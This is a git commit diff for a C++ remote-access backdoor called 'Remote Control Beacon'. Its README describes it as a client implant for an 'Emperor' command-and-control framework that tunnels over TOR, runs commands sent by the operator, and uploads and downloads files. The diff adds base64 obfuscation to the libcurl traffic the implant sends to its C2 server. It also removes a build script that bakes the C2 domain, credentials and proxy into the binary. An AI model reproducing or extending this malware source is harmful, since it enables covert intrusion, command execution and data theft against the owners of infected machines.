Added readme

.gitignore

@@ -0,0 +1 @@
+bin

.vimspector.json

@@ -0,0 +1,19 @@
+{
+	"configurations": {
+		"Debug RCB": {
+			"adapter": "vscode-cpptools",
+			"configuration": {
+				"type": "cppdbg",
+				"request": "launch",
+				"program": "${workspaceRoot}/RCB",
+				"args": [
+				],
+				"cwd": "${workspaceRoot}",
+				"environment": [
+				],
+				"MIMode": "gdb"
+			}
+		}
+	}
+}
+

MakeRCB.cpp

@@ -1,27 +0,0 @@
-#include <iostream>
-#include <string>
-
-int main()
-{
-	std::string sUsername;
-	std::string sPassword;
-	std::string sC2Domain;
-	std::string sProxy;
-
-	std::cout << "Enter the username to be used by RCB: ";
-	std::cin >> sUsername;
-
-	std::cout << "Enter the password to be used by RCB: ";
-	std::cin >> sPassword;
-
-	std::cout << "Enter the C2 domain to be used by RCB: ";
-	std::cin >> sC2Domain;
-
-	std::cout << "Enter the socks5 proxy address to be used by RCB: ";
-	std::cin >> sProxy;
-
-	std::string sCommand = "sUsername=" + sUsername + " sPassword=" + sPassword + " sC2Domain=" + "http:/" + sC2Domain + " sProxy=" + "socks5h:/" + sProxy + " make"; // todo: figure out why this works and why // doesn't
-	const char *cCommand = sCommand.c_str(); // convert string to c string for running as command
-
-	system(cCommand); // run the make command with environment variables
-}

RCB.cpp

@@ -1,6 +1,7 @@
 #include <curl/curl.h>
 #include <unistd.h>
 
+#include <array>
 #include <fstream>
 #include <iostream>
 #include <regex>
@@ -24,15 +25,61 @@ size_t writeCallback(void *contents, size_t size, size_t nmemb, std::string *s)
 	return newLength;
 }
 
+std::string encodeTriplet(std::uint8_t iByte1, std::uint8_t iByte2, std::uint8_t iByte3)
+{
+	std::array<char, 64> encodeTable{'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',
+					 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
+					 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/'};
+	std::string sEncodedTriplet = "";
+	std::uint32_t combinedTriplet = (iByte1 << 16) | (iByte2 << 8) | iByte3;
+	sEncodedTriplet += encodeTable[combinedTriplet >> 18];
+	sEncodedTriplet += encodeTable[combinedTriplet >> 12 & 0x3F];
+	sEncodedTriplet += encodeTable[combinedTriplet >> 6 & 0x3F];
+	sEncodedTriplet += encodeTable[combinedTriplet & 0x3F];
+	return sEncodedTriplet;
+}
+
+std::string b64Encode(std::string sWriteData)
+{
+	std::string sEncodedData = "";
+	std::string sEncodedBuffer;
+
+	while (sWriteData.length() > 0)
+	{
+		if (sWriteData.length() >= 3)
+		{
+			sEncodedData += encodeTriplet(sWriteData[0], sWriteData[1], sWriteData[2]);
+			sWriteData.erase(0, 3);
+		}
+		else if (sWriteData.length() == 2)
+		{
+			sEncodedBuffer = encodeTriplet(sWriteData[0], sWriteData[1], '0');
+			sEncodedBuffer.replace(3, 1, "$");
+			sEncodedData += sEncodedBuffer;
+			sWriteData.erase();
+		}
+		else if (sWriteData.length() == 1)
+		{
+			sEncodedBuffer = encodeTriplet(sWriteData[0], '0', '0');
+			sEncodedBuffer.replace(2, 2, "$$");
+			sEncodedData += sEncodedBuffer;
+			sWriteData.erase();
+		}
+	}
+	return sEncodedData;
+}
+
 std::string sendData(std::string sParam1, std::string sValue1, std::string sParam2 = "", std::string sValue2 = "")
 {
 	CURL *curl;
 	CURLcode res;
 	std::string sReadData;
+	sValue1 = b64Encode(sValue1);
 	std::string sWriteData = sParam1 + "=" + sValue1;
 
 	if (sParam2 != "")
 	{
+		sValue2 = b64Encode(sValue2);
 		sWriteData = sWriteData + "&" + sParam2 + "=" + sValue2;
 	}
 
@@ -47,9 +94,9 @@ std::string sendData(std::string sParam1, std::string sValue1, std::string sPara
 		curl_easy_setopt(curl, CURLOPT_USERNAME, STR(sUsername));      // set username for http auth
 		curl_easy_setopt(curl, CURLOPT_PASSWORD, STR(sPassword));      // set password for http auth
 		curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeCallback);  // write function for storing response
-		//char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length());
+		// char *cWriteData = curl_easy_escape(curl, sWriteData.c_str(), sWriteData.length());
 		curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, sWriteData.length());  // set the post request field size
-		curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str());//);	     // choose the data to send in the post request
+		curl_easy_setopt(curl, CURLOPT_POSTFIELDS, sWriteData.c_str());		   //);	     // choose the data to send in the post request
 		curl_easy_setopt(curl, CURLOPT_WRITEDATA, &sReadData);			   // write the data to the writeCallback function
 		curl_easy_perform(curl);						   // run query
 	}
@@ -137,13 +184,6 @@ int main()
 				std::string sSplit;
 				for (int i = 0; i < sResponse.length(); i++)
 				{
-					/*if (sResponse[i] == '\n' && bFilename == true)
-					{
-						sData.push_back(sSplit);  // add the sSplit string to the vector of strings sCommands
-						sSplit = "";		  // set sSplit to empty
-						bFilename = false;
-					}*/
-
 					if (sResponse[i] == '=' || sResponse[i] == '&')	 // if we have reached the end of the parameter
 					{
 						sData.push_back(sSplit);  // add the sSplit string to the vector of strings sCommands

README.md

@@ -0,0 +1,9 @@
+# Remote Control Beacon
+A client side Emperor C2 framework backdoor.
+
+This backdoor can communicate with Emperor itself, and can perform the following functions:
+* Connect to the server (via TOR through a configured FOB)
+* Request and execute commands
+* Upload and download files to and from the server
+
+Most of the communications between the client and server are base64 encoded, but not encrypted. This means that the traffic, before reaching the FOB, is unencrypted. I was considering maybe adding RC4 encryption in the future :)